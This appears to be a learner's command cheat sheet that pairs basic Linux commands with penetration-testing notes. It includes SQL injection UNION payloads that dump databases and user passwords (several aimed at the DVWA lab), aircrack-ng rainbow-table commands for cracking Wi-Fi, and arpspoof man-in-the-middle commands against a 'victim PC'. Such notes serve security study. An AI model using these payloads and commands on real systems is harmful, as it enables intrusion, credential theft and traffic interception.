-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCommands.txt
123 lines (84 loc) · 4.64 KB
/
Commands.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
**********************
*******Commands*******
**********************
/////////////////////////////////////////////////////////////////
FILES & FOLDERS
/////////////////////////////////////////////////////////////////
cd / change directory
cd .. / move one directory back
pwd / print working directory
ls / list files
ls -la / list all files (includes hidden)
mkdir folder_name / make directory
touch file.txt / create file
cp file_name directory / copy file to directory
mv file_name directory / moves file to directory OR change its name
mv file_name directory new_file_name / moves to targeted directory and changes file name
rm file.txt / remove file
rm folder -r / removes directory
rm * -r / deletes everything in current working directory
clear / clears console
chmod +x program.py / make file executable
cat file / prints content of file as terminal output
cat file.txt | grep search_criteria / searchs text input in file
echo input_text > file.txt / rewrite input text to the the file
history / shows previous commands from session
man program_name / shows manual for specified program
locate file_name / locate file
locate search_criteria / locates every file with current search criteria
/////////////////////////////////////////////////////////////////
SYSTEM & POWER
/////////////////////////////////////////////////////////////////
shutdown / shutdowns system in 1 minute
shutdown -h now / shutdown system instantly
reboot / reboots system
apt-get update / check updates from repository
ps / show current terminal running procceses
apt-get upgrade / upgrades repositories
top / shows all current running procceses
uname -a/ Name of operating system
whoami / shows current user
su user_name / changes user
usermod -aG sudo user_name / Add user to sudo group
ifconfig / linux equivalent of windows' ipconfig
netstat / shows network information
netstat -nr / gives you IP address of the gateway
netstat -ntp / gives you network addresses of current programs
ping -c 3 / ping 3 packages
/////////////////////////////////////////////////////////////////
SQL INJECTION
/////////////////////////////////////////////////////////////////
> MOST SIMPLE WAY TO CHECK IF SQL INJECTION IS POSSIBLE IS A SINGLE APOSTROFE = '
> THIS WILL PRINT AN ERROR, IF YOU SEE AN ERROR, YOU CAN INJECT SQL CODE
CREATE : Creates a DB/table in the Database
SELECT elements FROM table WHERE condition : Select a Column, row or Table (IE: SELECT name,description,price FROM products WHERE price<599 // SELECT columnA FROM tableX WHERE columnE = 'employee' AND columnF=100; )
UPDATE : Update DB
INSERT : Insert element
DELETE : Delete an element
DROP : Delete entires database
ORDER BY :
# : to comment a line
UNION : IE: UNION SELECT database(),users() #' //// 2' UNION SELECT schema_name,2 FROM information_schema.schemata # // 2' UNION SELECT table_name,2 FROM information_schema.tables WHERE table_schema='dvwa' #' // 2' union select column_name, column_type FROM information_schema.columns WHERE table_schema = 'dvwa' AND table_name='users' #'
CONCAT : IE : 2' UNION SELECT CONCAT(user_id,'-',first_name,' ',last_name), CONCAT(user,':',password) FROM dvwa.users #'
> Examples
Check Version > 1 ' UNION ALL SELECT NULL,version()-- #
Check Database Names > 1' UNION ALL SELECT NULL,concat(schema_name) FROM information_schema.schemata -- #
Retrieve table names > 1 ' UNION ALL SELECT NULL,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='add_database_name'-- #
Retrieve Column names > 1' UNION ALL SELECT NULL,concat(column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME='my_table' -- #
/////////////////////////////////////////////////////////////////
WIRELESS CRACKING
/////////////////////////////////////////////////////////////////
> Create rainbow table
airolib-ng rainbowtable --import essid essid.txt => airolib-ng filename --import essid file.txt
airolib-ng rainbowtable --import passwd pass.txt => airolib-ng filename --import essid file.txt
airolib-ng rainbowtable --stat => airolib-ng filename --stat //// check status
airolib-ng rainbowtable --batch => airolib-ng filename --batch //// create hashes of passwords in file to compare with hashed password
airolib-ng rainbowtable --clean all => cleans rainbowtable
aircrack-ng -r rainbowtable myfile.cap => Runs rainbowtable attack
> Wireless attack
/////////////////////////////////////////////////////////////////
MAN IN THE MIDDLE
/////////////////////////////////////////////////////////////////
echo 1 > /proc/sys/net/ipv4/ip_forward (AS ROOT TO FORWARD INTERNET)
sudo arpspoof -i eth1 -t 192.168.1.140 192.168.1.1 (VICTIMS PC / ROUTER)
sudo arpspoof -i eth1 -t 192.168.1.1 192.168.1.140 (ROUTER / VICTIMS PC)